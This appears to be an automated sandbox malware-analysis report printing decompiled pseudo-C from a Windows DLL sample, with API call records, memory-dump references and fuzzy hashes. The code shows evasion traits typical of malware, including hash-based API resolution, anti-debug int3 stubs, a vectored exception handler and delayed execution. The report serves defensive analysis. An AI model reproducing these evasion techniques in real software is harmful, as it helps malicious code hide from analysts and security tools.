					if( *(_t429 + 0x1a0) != 0) {
						E6F32F584(_t429 + 0x3c, _t262);
						_t265 = E6F33306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6F32F654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6F32F4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6F32F4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6F3335F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6F32F4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6F33306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6F3335F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6F330FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6F33306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6F330FD4(_t403, _t413, _t403);
								}
								E6F32F654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6F32BB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6F32BB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6f33073f
0x6f330741
0x6f330748
0x6f330fc7
0x6f330fcd
0x6f330fcd
0x6f330752
0x6f33075e
0x6f33076a
0x6f33076f
0x6f33077c
0x6f33078d
0x6f33078f
0x6f330790
0x6f330791
0x6f330791
0x6f330792
0x6f330796
0x6f33079a
0x6f33079f
0x6f3307a2
0x6f3307a8
0x6f3307c2
0x6f3307c9
0x6f3307cc
0x6f3307cf
0x6f3307d1
0x6f3307dd
0x6f3307ea
0x6f3307f7
0x6f3307fb
0x6f330887
0x6f330887
0x6f330889
0x6f33088d
0x6f330898
0x6f3308ae
0x6f3308b1
0x6f3308b1
0x6f3308b5
0x6f3308be
0x6f3308c3
0x6f3308c3
0x6f3308c5
0x6f3308d6
0x6f3308f8
0x6f3308fa
0x6f3308fb
0x6f3308ff
0x6f3308ff
0x6f330908
0x6f330914
0x6f33091d
0x6f330933
0x6f330943
0x6f330948
0x6f33094c
0x6f330951
0x6f330953
0x6f3309a3
0x6f3309b8
0x6f3309bc
0x6f3309c1
0x6f3309d2
0x6f3309e7
0x6f3309eb
0x6f3309f0
0x6f3309f2
0x6f330a39
0x6f330a3c
0x6f330a8a
0x6f330a8d
0x6f330ace
0x6f330ad2
0x6f330ad7
0x6f330adc
0x6f330afb
0x6f330afb
0x6f330afb
0x6f330afd
0x00000000
0x6f330afd
0x6f330ade
0x6f330ae2
0x6f330ae4
0x6f330aeb
0x6f330aeb
0x6f330af1
0x6f330af1
0x6f330af3
0x6f330af6
0x6f330af6
0x00000000
0x6f330af3
0x6f330ae6
0x6f330ae9
0x6f330aef
0x6f330aef
0x00000000
0x6f330aef
0x00000000
0x6f330ae9
0x6f330a8f
0x6f330a92
0x00000000
0x00000000
0x6f330a98
0x6f330a9d
0x6f330aa2
0x6f330ac1
0x6f330ac1
0x6f330acb
0x00000000
0x6f330acb
0x6f330aa4
0x6f330aa8
0x6f330aaa
0x6f330ab1
0x6f330ab1
0x6f330ab7
0x6f330ab7
0x6f330ab9
0x6f330abc
0x6f330abc
0x00000000
0x6f330ab9
0x6f330aac
0x6f330aaf
0x6f330ab5
0x6f330ab5
0x00000000
0x6f330ab5
0x00000000
0x6f330aaf
0x6f330a3e
0x6f330a40
0x6f330a7f
0x6f330a82
0x6f330df4
0x6f330df9
0x6f330dfe
0x6f330e1d
0x6f330e1d
0x6f330e27
0x00000000
0x6f330e27
0x6f330e00
0x6f330e04
0x6f330e06
0x6f330e0d
0x6f330e0d
0x6f330e13
0x6f330e13
0x6f330e15
0x6f330e18
0x6f330e18
0x00000000
0x6f330e15
0x6f330e08
0x6f330e0b
0x6f330e11
0x6f330e11
0x00000000
0x6f330e11
0x00000000
0x6f330e0b
0x00000000
0x6f330a88
0x6f330a46
0x6f330a4b
0x6f330a50
0x6f330a6f
0x6f330a6f
0x6f330a79
0x00000000
0x6f330a79
0x6f330a52
0x6f330a56
0x6f330a58
0x6f330a5f
0x6f330a5f
0x6f330a65
0x6f330a65
0x6f330a67
0x6f330a6a
0x6f330a6a
0x00000000
0x6f330a67
0x6f330a5a
0x6f330a5d
0x6f330a63
0x6f330a63
0x00000000
0x6f330a63
0x00000000
0x6f330a5d
0x6f3309f4
0x6f3309f6
0x00000000
0x00000000
0x6f330a00
0x6f330a05
0x6f330a0a
0x6f330a29
0x6f330a29
0x6f330a33
0x00000000
0x6f330a33
0x6f330a0c
0x6f330a10
0x6f330a12
0x6f330a19
0x6f330a19
0x6f330a1f
0x6f330a1f
0x6f330a21
0x6f330a24
0x6f330a24
0x00000000
0x6f330a21
0x6f330a14
0x6f330a17
0x6f330a1d
0x6f330a1d
0x00000000
0x6f330a1d
0x00000000
0x6f330a17
0x6f330959
0x6f33095e
0x6f330963
0x6f330982
0x6f330982
0x6f33098c
0x00000000
0x6f33098c
0x6f330965
0x6f330969
0x6f33096b
0x6f330972
0x6f330972
0x6f330978
0x6f330978
0x6f33097a
0x6f33097d
0x6f33097d
0x00000000
0x6f33097a
0x6f33096d
0x6f330970
0x6f330976
0x6f330976
0x00000000
0x6f330976
0x00000000
0x6f33089a
0x6f33089c
0x6f330b01
0x6f330b06
0x6f330b09
0x6f330b0e
0x6f330b10
0x6f330b25
0x6f330b28
0x6f330bf6
0x6f330bfe
0x6f330c01
0x6f330c16
0x6f330c20
0x6f330c20
0x6f330c22
0x6f330c24
0x6f330c33
0x6f330c3f
0x6f330c43
0x6f330c46
0x6f330c49
0x6f330c4c
0x00000000
0x6f330c4c
0x6f330b38
0x6f330b4a
0x6f330b4e
0x6f330bda
0x6f330bda
0x6f330be0
0x6f330beb
0x6f330be2
0x6f330be2
0x6f330be2
0x00000000
0x6f330be0
0x6f330b5b
0x6f330b5c
0x6f330b5e
0x6f330b64
0x6f330fb3
0x6f330fb8
0x6f330fba
0x00000000
0x00000000
0x6f330fc0
0x6f330b7b
0x6f330b7f
0x6f330b84
0x6f330b96
0x6f330b9a
0x6f330ba5
0x6f330ba6
0x6f330ba7
0x6f330ba8
0x6f330baa
0x6f330bb5
0x6f330e2d
0x6f330e2d
0x6f330bb5
0x6f330bbb
0x6f330bc4
0x6f330e3f
0x6f330e55
0x6f330e57
0x6f330e59
0x6f330f94
0x6f330f9b
0x00000000
0x6f330f9b
0x6f330e68
0x6f330e76
0x6f330e90
0x6f330e92
0x6f330e94
0x6f330fa5
0x6f330faa
0x6f330fac
0x00000000
0x00000000
0x6f330fae
0x6f330ea8
0x6f330eb3
0x6f330ec2
0x6f330ed4
0x6f330ed6
0x6f330ed8
0x6f330ee5
0x6f330ee5
0x6f330ef5
0x6f330f06
0x6f330f0b
0x6f330f0d
0x6f330f0f
0x6f330f16
0x6f330f17
0x6f330f17
0x6f330f23
0x6f330f44
0x6f330f4d
0x6f330f59
0x6f330f65
0x6f330f6a
0x6f330f6f
0x6f330f75
0x6f330f75
0x6f330f7a
0x6f330f80
0x00000000
0x6f330f86
0x6f330f88
0x00000000
0x6f330f88
0x6f330bca
0x6f330bca
0x6f330bcf
0x6f330bd5
0x6f330bd5
0x00000000
0x6f330bcf
0x6f330bc4
0x6f330898
0x6f330808
0x6f330809
0x6f33080b
0x6f330811
0x6f330dde
0x6f330de3
0x6f330de5
0x00000000
0x00000000
0x6f330deb
0x6f330828
0x6f33082c
0x6f330831
0x6f330847
0x6f33085e
0x6f330862
0x6f330c5a
0x6f330c5a
0x6f330862
0x6f330868
0x6f330871
0x6f330c69
0x6f330c7a
0x6f330c7f
0x6f330c81
0x6f330c83
0x6f330db4
0x6f330db8
0x00000000
0x6f330db8
0x6f330c8f
0x6f330cb4
0x6f330cb6
0x6f330cb8
0x6f330dd0
0x6f330dd5
0x6f330dd7
0x00000000
0x00000000
0x6f330dd9
0x6f330cc9
0x6f330cd7
0x6f330cde
0x6f330cdf
0x6f330ce0
0x6f330cf2
0x6f330cf4
0x6f330cf6
0x00000000
0x00000000
0x6f330cfe
0x6f330d19
0x6f330d1b
0x6f330d1d
0x6f330dc2
0x6f330dc7
0x6f330dc9
0x00000000
0x00000000
0x6f330dcb
0x6f330d23
0x6f330d2a
0x6f330d2e
0x6f330d99
0x6f330d99
0x6f330d9b
0x6f330da2
0x6f330da2
0x6f330da8
0x6f330da8
0x6f330daa
0x6f330daf
0x6f330daf
0x00000000
0x6f330daa
0x6f330d9d
0x6f330da0
0x6f330da6
0x6f330da6
0x00000000
0x6f330da6
0x00000000
0x6f330da0
0x6f330d30
0x6f330d30
0x6f330d32
0x6f330d3e
0x6f330d43
0x6f330d45
0x00000000
0x00000000
0x6f330d47
0x6f330d4b
0x6f330d52
0x6f330d53
0x6f330d54
0x6f330d56
0x00000000
0x00000000
0x6f330d58
0x6f330d5a
0x6f330d61
0x6f330d61
0x6f330d67
0x6f330d67
0x6f330d69
0x6f330d6e
0x6f330d6e
0x6f330d77
0x6f330d7c
0x6f330d81
0x6f330d87
0x6f330d87
0x6f330d8c
0x00000000
0x6f330d8c
0x6f330d5c
0x6f330d5f
0x6f330d65
0x6f330d65
0x00000000
0x6f330d65
0x00000000
0x6f330d93
0x6f330d93
0x6f330d94
0x6f330d94
0x00000000
0x6f330d32
0x6f330877
0x6f33087c
0x6f330882
0x6f330882
0x00000000
0x6f330c59
0x6f330c59
0x6f330c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6F33085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6F330C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6F330CB4

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 5bb51bfb5d9fb1544ed3e98c27cedd48ec60ac09e83cb80b133aa4359357bd49
Instruction ID: 20d88777d4ecbcf427af9582075b0d30484f50b1c097bec62e24b4b44e953fcc
Opcode Fuzzy Hash: 5bb51bfb5d9fb1544ed3e98c27cedd48ec60ac09e83cb80b133aa4359357bd49
Instruction Fuzzy Hash: 1B22C4B2A083E1AEE710DB28C950BDF77E9AF9170CF10991DA8D59B2D0DB31E905C752

Uniqueness

Uniqueness Score: -1.00%

Function 6F332234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6F332234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6F333AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6F33306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6f332234
0x6f332238
0x6f332254
0x6f332257
0x6f33223a
0x6f332249
0x6f33224c
0x6f33224c
0x6f332267
0x6f33226c
0x6f332270
0x6f332278
0x6f332278
0x6f33227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6F324B17,00000000,00000000,?), ref: 6F332278

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: 88a44772f0a56e65ad1a1c263522deafec8939d9e3e10151096d4c2609d8c5c7
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: 0EE065B190E351ADE744D62C8D01B6B76D8AF84611F20C62DB4A8D61C4E671D4018361

Uniqueness

Uniqueness Score: -1.00%

Function 6F332820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F332820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6F33306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6f332827
0x6f332830
0x6f33283e
0x6f332861
0x6f332861
0x6f332840
0x6f332857
0x6f33285b
0x00000000
0x6f33285d
0x6f33285d
0x6f33285d
0x6f33285b
0x6f332866

APIs

NtAllocateVirtualMemory.NTDLL(6F3388E6,?,00000000,000000FF,6F3388E6,6F3388E6,60A28C5C,60A28C5C,?,?,6F3388E6,00003000,00000004,000000FF), ref: 6F332857

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: a85b40dbd4ab4f9ad04f80edeb9fc357a5918791dbffd3ccdd7366ff93e2a19c
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: 83E03972609392AFEB08CA29CD10EABB7E9EF84A04F108C2DB595CA250D731E8009761

Uniqueness

Uniqueness Score: -1.00%

Function 6F333138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6F333138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6F3334B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6f333138
0x6f33313d
0x6f33313f
0x6f333141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6F3334B0,6F333128,60A28C5C,60A28C5C,?,6F326C99,00000000), ref: 6F33313F

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 236fd9d3d8367f9b8a93b7487220cdce5c1ade838b2e37f23051de9f3c1108ca
Instruction ID: 5520351c975efcbcde1574f1a31ccb7eebca6841a138c1f32138dede619130d3
Opcode Fuzzy Hash: 236fd9d3d8367f9b8a93b7487220cdce5c1ade838b2e37f23051de9f3c1108ca
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6F335E84, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F335E84(void* __ecx, void* __eflags, void* _a4, char _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6F32C280(_t19) == 0) {
					_t2 =  &_a8; // 0x6f335d79
					_v12 =  *_t2;
					if(E6F333064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6F3335F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6f335e87
0x6f335e89
0x6f335e95
0x6f335e9b
0x6f335e9f
0x6f335eb5
0x6f335ed4
0x6f335eb7
0x6f335ec8
0x6f335ecc
0x6f335eec
0x6f335ece
0x6f335ece
0x6f335ece
0x6f335ecc
0x6f335ed5
0x6f335eda
0x6f335ee3
0x6f335edc
0x6f335edc
0x6f335ede
0x6f335ede
0x6f335e97
0x6f335e97
0x6f335e97
0x6f335ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6F335D79,00000000,?,00000000,?), ref: 6F335EC8

Strings

y]3o, xrefs: 6F335E9B

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID: y]3o
API String ID: 2738559852-2054263824
Opcode ID: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction ID: a6d7b1f1ca9f53eb675639627871dba44fc5b8bdd3aa83037d38918d491b01cd
Opcode Fuzzy Hash: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction Fuzzy Hash: 5EF08632A58367EED791DA3CDE00AEA77D9AF55250F10892AA895C2350EB32E404C761

Uniqueness

Uniqueness Score: -1.00%

Function 6F3310A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6F3310A4(void* __ebx, void* __ecx) {
				intOrPtr* _t34;
				long* _t55;
				long* _t59;
				intOrPtr* _t64;
				void* _t73;
				void* _t74;
				void* _t79;
				long* _t80;

				_t74 = __ecx;
				_t80[7] = 0;
				_t64 = E6F33306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t64 != 0) {
					 *_t64(_t74, 8,  &(_t80[7]));
				}
				_t55 = _t80;
				 *_t55 = _t80[7];
				_t55[1] = 1;
				if(E6F32C280(_t55) != 0) {
					L6:
					if(_t80[1] != 0) {
						E6F32BB44(_t80);
					}
					return 0;
				}
				_t80[6] = 0;
				if(E6F33306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
					GetTokenInformation(_t80[4], 0x19, 0, 0,  &(_t80[6])); // executed
				}
				_t30 = _t80[6];
				if(_t80[6] != 0) {
					E6F32F584( &(_t80[3]), _t30);
					_t59 =  &(_t80[3]);
					_t73 = E6F32F4BC(_t59, 0);
					_t34 = E6F33306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
					if (_t34 == 0) goto L33;
					 *_t34 =  *_t34 + _t34;
					 *((intOrPtr*)(_t79 + 0x50182444)) =  *((intOrPtr*)(_t79 + 0x50182444)) + _t59;
				} else {
					goto L6;
				}
			}

0x6f3310b3
0x6f3310b5
0x6f3310c4
0x6f3310c8
0x6f3310d2
0x6f3310d2
0x6f3310d8
0x6f3310db
0x6f3310dd
0x6f3310e8
0x6f331122
0x6f331127
0x6f33112c
0x6f33112c
0x00000000
0x6f331131
0x6f3310f4
0x6f331107
0x6f331118
0x6f331118
0x6f33111a
0x6f331120
0x6f33113e
0x6f331145
0x6f33114e
0x6f33115c
0x6f331165
0x6f331168
0x6f33116a
0x00000000
0x00000000
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6F331118
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6F33117B

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
Instruction ID: fef0be1cf28a2f78446ac790289c6980a22bcab947c8379fa2c6a36c55b508d5
Opcode Fuzzy Hash: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
Instruction Fuzzy Hash: 6741E472E843E26AEB15E5689C50BEFB7E89F95304F108829B990CA1D0DF25D846C761

Uniqueness

Uniqueness Score: -1.00%

Function 6F3357B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6F3357B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6F333064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6F32F828(_a8, _t15);
							if(E6F333064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6F32F4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6f3357b8
0x6f3357b9
0x6f3357bb
0x6f3357c0
0x6f3357c7
0x6f3357cb
0x6f3357cb
0x6f3357cb
0x6f3357cf
0x6f335815
0x6f335815
0x6f3357d1
0x6f3357d1
0x6f3357d7
0x6f3357e0
0x6f3357e3
0x6f3357fa
0x6f33580b
0x6f33580b
0x6f33580d
0x6f335813
0x6f33581e
0x6f335836
0x6f335856
0x6f335856
0x6f335858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6f3357d7
0x6f335860

APIs

RegQueryValueExA.KERNELBASE(?,6F33D1F8,00000000,?,00000000,00000000,?,?,?,6F33D1F8,?,6F335887,?,00000000,00000000), ref: 6F33580B
RegQueryValueExA.KERNELBASE(?,6F33D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6F33D1F8,?,6F335887,?,00000000), ref: 6F335856

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction ID: 30b76bc8203f7a54e81650130da69f16a5ea3c524eb1b10b77aa58ea6a988dcd
Opcode Fuzzy Hash: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction Fuzzy Hash: BC117F72709396ABD650DA69DC80EABBBDCDF46754F00891EF4959B181EB22F800CB71

Uniqueness

Uniqueness Score: -1.00%

Function 6F335B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6F335B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6F32D1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6F32D6D0(__ecx, _t60);
					E6F32CFF8(_t56,  *_t60);
					E6F32CFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6F3362B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6F333064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6F32C26C(_t40);
					if(E6F32C280(_t40) != 0) {
						_t56[2] = E6F3335F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6F333064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6F333698(_t59, 0xff, 8);
						if(E6F333064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6f335b43
0x6f335b45
0x6f335b52
0x6f335b56
0x6f335b5a
0x6f335b64
0x6f335b6b
0x6f335b6b
0x6f335b72
0x6f335b74
0x6f335b79
0x6f335b82
0x6f335b8a
0x6f335b8a
